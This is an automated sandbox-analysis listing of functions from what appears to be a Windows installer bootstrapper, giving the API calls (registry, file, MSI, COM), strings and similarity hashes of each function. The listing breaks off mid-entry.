Part of subcall function 00CC3DFC: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00CC7B1F,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC3E10

Strings

regutil.cpp, xrefs: 00CC4131

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: regutil.cpp
API String ID: 47109696-955085611
Opcode ID: 834eb54776fc5af95ed9375ea36f59b5051489c43d254912b00b0e650668d2bc
Instruction ID: 6d0267d95c08ca7a085d6db9b3f6f956f07688b2f286850bcd0f49639cf4d0d1
Opcode Fuzzy Hash: 834eb54776fc5af95ed9375ea36f59b5051489c43d254912b00b0e650668d2bc
Instruction Fuzzy Hash: 5F41E73294011AEBDF299E95CC25FAE7AB6AF90310F29C17DE620E7151EB71CF819740

Function 00CC3841 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,80070002,80070003,00000000,00000000,00000000), ref: 00CC38B2
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00CC38EB

Strings

regutil.cpp, xrefs: 00CC3950

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: e9f916598eeec764984bda610e913412eaa2e1eebc0fa2a6f818cd001dc89674
Instruction ID: 2587c5aafa826c1ae1912dc135c006ccb70cc12466780565f1880e0f43d7bdb6
Opcode Fuzzy Hash: e9f916598eeec764984bda610e913412eaa2e1eebc0fa2a6f818cd001dc89674
Instruction Fuzzy Hash: 8641FA71A0028AAFDF109FA4DC85EAEB7B9FF04300F24896EF925E6151D3B19B54DB50

Function 00CC8CEF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC892B: lstrlenW.KERNEL32(?,?,?,00CC8A4B,?,?,?,00000000,?,?,?,00CAFB67,?,?,?,00000000), ref: 00CC894E

RegCloseKey.ADVAPI32(00000000,00C913BB,?,?,00C913BB,00000000,00000000,?,00C913BB,00000001,00000000), ref: 00CC8DD4
RegCloseKey.ADVAPI32(00000001,00C913BB,?,?,00C913BB,00000000,00000000,?,00C913BB,00000001,00000000), ref: 00CC8DEE

Part of subcall function 00CC3D8C: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00C913BB,?,?,00000001,?,00C972CB,?,00C913BB,00020006,00000001), ref: 00CC3DB0

Part of subcall function 00CC4173: RegSetValueExW.ADVAPI32(00020006,?,00000000,00000001,?,00000000,?,000000FF,00000000,00000001,?,?,00C969E2,00000000,?,00020006), ref: 00CC41A6

Part of subcall function 00CC4173: RegDeleteValueW.ADVAPI32(00020006,?,00000001,?,?,00C969E2,00000000,?,00020006,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 00CC41D5

Part of subcall function 00CC3C9B: RegSetValueExW.ADVAPI32(?,00020006,00000000,00000004,00C96938,00000004,00000001,?,00C96938,00020006,Resume,00C913BB,00000000,00000000,?,?), ref: 00CC3CB0

Strings

%ls\%ls, xrefs: 00CC8D50

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Value$Close$CreateDeletelstrlen
String ID: %ls\%ls
API String ID: 3924016894-2125769799
Opcode ID: f63308fb478daeb1d3093896d7a5b17a5599652b2fbff002006d35e0635b78ef
Instruction ID: 5a822d4fdca2576483958bcb897088d9d328ca62526d1cb9a2cf1416249378a4
Opcode Fuzzy Hash: f63308fb478daeb1d3093896d7a5b17a5599652b2fbff002006d35e0635b78ef
Instruction Fuzzy Hash: 6F310731D0122EFBCF12AFD4EC85E9FBB79EF19B40B10446AF511A2121D7714A54EBA0

Function 00CC5E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000,00000000,75C0B390,00000000,?,00CA7FCF,?,?,?,00000000,00000000,?), ref: 00CC5EF8
GetLastError.KERNEL32(?,00CA7FCF,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00C9130D,?,?), ref: 00CC5F6F

Strings

fileutil.cpp, xrefs: 00CC5FA2

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: fileutil.cpp
API String ID: 1948546556-2967768451
Opcode ID: 82445356cc72574b8c2112cc866ffa5eb5a7f4a5d5d6d55d782e0bd53e13a8c9
Instruction ID: 718096be9f39f3467de3cd29f35bf59bd14cccca36aa0648ce832ea85c732964
Opcode Fuzzy Hash: 82445356cc72574b8c2112cc866ffa5eb5a7f4a5d5d6d55d782e0bd53e13a8c9
Instruction Fuzzy Hash: D5316D71900699DBEF26CF59CD40BDDB7B4AF48301F1080EEE449E6240D6B4AEC49F60

Function 00CC527D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

#171.MSI(00000000,?,00CCB5F8,?), ref: 00CC52D7
#171.MSI(00000000,?,?,00000000,?,00000000,00000000,?,00CCB5F8,?), ref: 00CC5318

Part of subcall function 00CC4FEC: #115.MSI(?), ref: 00CC5019
Part of subcall function 00CC4FEC: #116.MSI(?,00000001,?), ref: 00CC5039

Strings

wiutil.cpp, xrefs: 00CC5336

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: #171$#115#116
String ID: wiutil.cpp
API String ID: 2532461077-4248292292
Opcode ID: bbeeb5ba974639d858d92e9278dd8cb088e193c75bd6d705ff59747d7d29b349
Instruction ID: 7769ab7ca1527322b04e3fd8c0b1c25b9edbaddad68fdf5efa30d92704ff95f4
Opcode Fuzzy Hash: bbeeb5ba974639d858d92e9278dd8cb088e193c75bd6d705ff59747d7d29b349
Instruction Fuzzy Hash: 2C215E76A00A49FBDB149EA4CC41FAE77A8EF44350F18813DFD24E6250D674EA81AB50

Function 00CC1879 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CC1919
_memmove.LIBCMT ref: 00CC1924

Part of subcall function 00CC299C: GetProcessHeap.KERNEL32(00000000,?,?,00CC0EF7,?,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC29A4
Part of subcall function 00CC299C: HeapSize.KERNEL32(00000000,?,00CC0EF7,?,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000,?), ref: 00CC29AB

Strings

W, xrefs: 00CC189F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap_memmove$ProcessSize
String ID: W
API String ID: 3606272560-655174618
Opcode ID: 860b640bbe695b72c97eca0d54e0e022c5721fc14f195b2ecb93ce81ed83baaf
Instruction ID: 52fc7fba1c10d86c4668d159339fd73f0c10699d716fd7c5146e17cb4cb5cfbc
Opcode Fuzzy Hash: 860b640bbe695b72c97eca0d54e0e022c5721fc14f195b2ecb93ce81ed83baaf
Instruction Fuzzy Hash: 1121A471A00206FBDF10DF66CC90EAE77B9EF46364B68462CEC5097181EB30DA019B20

Function 00CC36FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC3723

Strings

d, xrefs: 00CC3768
srputil.cpp, xrefs: 00CC37AF

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: d$srputil.cpp
API String ID: 2102423945-1161740003
Opcode ID: 1de31de43165fcd9c44d406a11803d63a02b6fa20ebf130c807f68ff8ea57e81
Instruction ID: 82f61bd9ea1da52f052d81661e0ed460cb57f1ec236b3513ee021c4f4751545a
Opcode Fuzzy Hash: 1de31de43165fcd9c44d406a11803d63a02b6fa20ebf130c807f68ff8ea57e81
Instruction Fuzzy Hash: 8911B7B2A5021DAAEB20DAA4DCC6FEE77BCEB04704F00456DE611DB141D678DE488B90

Function 00CC1FE9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

_memmove_s.LIBCMT ref: 00CC206B

Strings

\\?\, xrefs: 00CC2030
\\?\UNC, xrefs: 00CC2075

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memmove_s
String ID: \\?\$\\?\UNC
API String ID: 800865076-2523517826
Opcode ID: 75ca1382545c8116be9f7ab2677fc1b57b8578f29c6d00d53d7b713b8f6b6825
Instruction ID: 46e607e90bdc68d1dcc9a78dbd9e9d755561307fe7a2123e886a00e67d625b9c
Opcode Fuzzy Hash: 75ca1382545c8116be9f7ab2677fc1b57b8578f29c6d00d53d7b713b8f6b6825
Instruction Fuzzy Hash: 6511E372340301B9E6349B05DC42FFB735DEB60FA5F80402FF6599A0D1E6A2AAC2D365

Function 00C940C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,?,00CAFF0C,00000000,IGNOREDEPENDENCIES,00000000,?), ref: 00C94116

Strings

Failed to copy the property value., xrefs: 00C94146
IGNOREDEPENDENCIES, xrefs: 00C940D2

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
API String ID: 1825529933-1412343224
Opcode ID: b6ae368833f55f4b264f464e2f11fdd3a93bdbd2cc9041da28f5b1dc367a3ae6
Instruction ID: eb90bfb17c7bde7cfd27209481bebce66bcf809fc7f53beeab7b4aba5c6e9121
Opcode Fuzzy Hash: b6ae368833f55f4b264f464e2f11fdd3a93bdbd2cc9041da28f5b1dc367a3ae6
Instruction Fuzzy Hash: 2D119172904218EFCF188F54CC88EAE77A9EF15361F26417AF929A7251C7309E92DB50

Function 00CC4173 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00020006,?,00000000,00000001,?,00000000,?,000000FF,00000000,00000001,?,?,00C969E2,00000000,?,00020006), ref: 00CC41A6
RegDeleteValueW.ADVAPI32(00020006,?,00000001,?,?,00C969E2,00000000,?,00020006,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 00CC41D5

Strings

regutil.cpp, xrefs: 00CC4208

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Value$Delete
String ID: regutil.cpp
API String ID: 1738766685-955085611
Opcode ID: 6c9d2ca4193330dd9990551994be5256662149095e4bbdf27a73c1481d2b2694
Instruction ID: a0e14637005fb60a2ac2128783fb96d2c425d8076b88619683bcf6747c799a1e
Opcode Fuzzy Hash: 6c9d2ca4193330dd9990551994be5256662149095e4bbdf27a73c1481d2b2694
Instruction Fuzzy Hash: 7C118636D4022BB7DB354A90CC1AF6E7965AF11760F15826CFE20FA0D0D675DE5096D0

Function 00CA1C48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC3DFC: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00CC7B1F,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC3E10

RegCloseKey.ADVAPI32(?,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001,?,?,?,00CA1FA6,00000000,?,?,?), ref: 00CA1CD5

Part of subcall function 00CC3841: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,80070002,80070003,00000000,00000000,00000000), ref: 00CC38B2
Part of subcall function 00CC3841: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00CC38EB

Strings

SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 00CA1C57
Logging, xrefs: 00CA1C76

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer
API String ID: 1586453840-387823766
Opcode ID: 666ce8009afae31e860c3ce00409fe80f04f73459afb548fb1ded1c394c40e9e
Instruction ID: effc2d1c5c7eb00fa7ba5136725729cb1d85247dabf55000683c065c45c4c8a7
Opcode Fuzzy Hash: 666ce8009afae31e860c3ce00409fe80f04f73459afb548fb1ded1c394c40e9e
Instruction Fuzzy Hash: 42110C71B8430AFADB309B41DE02ABE7BB9EB4276CF584166ED41E6190D3715F81A600

Function 00CC010B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,20000004,?,00CA7CFD,00000000,00000001,20000004,00000000,00000000,00000000,00000000), ref: 00CC013C
SetNamedSecurityInfoW.ADVAPI32(00000000,000007D0,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,20000004,?,00CA7CFD,00000000), ref: 00CC0157

Strings

aclutil.cpp, xrefs: 00CC017D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: InfoNamedSecuritySleep
String ID: aclutil.cpp
API String ID: 2352087905-2159165307
Opcode ID: 30dda1f73de592fe3c5fc00a7d80a0866c6d1354aa232e1e02cf1472f7dcfb1f
Instruction ID: 241ec81a2106b2710ab26f4132aa389c1e390502812ebdc10817b8486c06708d
Opcode Fuzzy Hash: 30dda1f73de592fe3c5fc00a7d80a0866c6d1354aa232e1e02cf1472f7dcfb1f
Instruction Fuzzy Hash: FF015E3390012AFBDF125E85CD05FDEBA75EF44754F294228FA14B6160D735CE61AB90

Function 00C9C1CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 00C9C1E3
CoUninitialize.OLE32(?,?,?,?,?,?), ref: 00C9C246

Strings

Failed to initialize COM on cache thread., xrefs: 00C9C1F0

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: InitializeUninitialize
String ID: Failed to initialize COM on cache thread.
API String ID: 3442037557-3629645316
Opcode ID: 24e43c725bc023da2297d9ef098ef53f77edb19f7a9c32dfc6388123ed3c2c91
Instruction ID: 18cf28e8b9b7e94bc7b12a7ef3b71234936674d710927e696735b989e974f8e6
Opcode Fuzzy Hash: 24e43c725bc023da2297d9ef098ef53f77edb19f7a9c32dfc6388123ed3c2c91
Instruction Fuzzy Hash: 9B0121B1500609BFDB10DFA4D845FDAB7ECEF08355F108026F909D7111DB31AA449B64

Function 00CC6B0D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC3DFC: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00CC7B1F,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC3E10

RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,00CC6BB9,?), ref: 00CC6B7B

Part of subcall function 00CC3C0E: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000105,00000000,00000000,?,?,?,?,00C9565B,00000000,Installed,00000000,?), ref: 00CC3C33

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00CC6B2B
EnableLUA, xrefs: 00CC6B4D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 3677997916-3551287084
Opcode ID: 04fb343438d84e3ce9d0cc4dfb58bb8b31cdf28ab5063f589b44a09eb09999ef
Instruction ID: 996014bb70cca8250690384b42ee6722bc903245a35630d3352b73b794b09b35
Opcode Fuzzy Hash: 04fb343438d84e3ce9d0cc4dfb58bb8b31cdf28ab5063f589b44a09eb09999ef
Instruction Fuzzy Hash: 1101A276600218FFDB11DFA5CE86F9EFAB9EB88750F204079E505E3110EA709F40A760

Function 00CC1D0F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CC1DBE,00000000,?,00000200), ref: 00CC1D53
GetLastError.KERNEL32(?,00CC1DBE,00000000,?,00000200,?,00CC74B0,00000000,00000000,00000000,00000000,?,00000000,?,00CC788C,00000000), ref: 00CC1D5D

Strings

strutil.cpp, xrefs: 00CC1D82

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastString
String ID: strutil.cpp
API String ID: 3728238275-3612885251
Opcode ID: dbf89335de2934f28bb9477e2467ebef0cf3c145b0e484b66f6932be949addc7
Instruction ID: e638440f746f4cced043c0613ff82099699b0edfaba9f6b8bbc5c6aef1dc7182
Opcode Fuzzy Hash: dbf89335de2934f28bb9477e2467ebef0cf3c145b0e484b66f6932be949addc7
Instruction Fuzzy Hash: 0601D43A200516BBDB121E92CC05F9B3F79DF82770F19402CFD289B151EB35C9009BA0

Function 00C99FB2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 00C99FC7

Part of subcall function 00CC054B: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,00000000,?,?,00C99175,00000000), ref: 00CC055F
Part of subcall function 00CC054B: GetProcAddress.KERNEL32(00000000), ref: 00CC0566
Part of subcall function 00CC054B: GetLastError.KERNEL32(?,?,00C99175,00000000), ref: 00CC057D

Part of subcall function 00C99B4F: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00C99BD5

Strings

Failed to set variant value., xrefs: 00C9A003
Failed to get 64-bit folder., xrefs: 00C99FEA

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
String ID: Failed to get 64-bit folder.$Failed to set variant value.
API String ID: 3109562764-2681622189
Opcode ID: cef34d1e110dfc6a67d1b240718a41f9837d3cc51f3c2a09d30ca042d52d5c96
Instruction ID: fd9af18cd96f1cdf3471a4e0c7b2bf6b5a5ef65751c9585a8c5183592b3a5a1c
Opcode Fuzzy Hash: cef34d1e110dfc6a67d1b240718a41f9837d3cc51f3c2a09d30ca042d52d5c96
Instruction Fuzzy Hash: DC01D672800118FA8F21ABA9DC0ADDEFBBCDF84710B20416AF816A3110D6315F50B691

Function 00CC208E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00C9213E,?,00000104,?,00000104,?,00000000,?,?,00C9213E,?,00000000,?,?,?,76EEC3F0), ref: 00CC20AF
GetLastError.KERNEL32(?,00C9213E,?,00000000,?,?,?,76EEC3F0,?,00000000), ref: 00CC20C6

Strings

pathutil.cpp, xrefs: 00CC20EB

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: pathutil.cpp
API String ID: 2776309574-741606033
Opcode ID: 49be8a61a86f247522c51b923c40614f43531019def423c07346c0b0c4cdb566
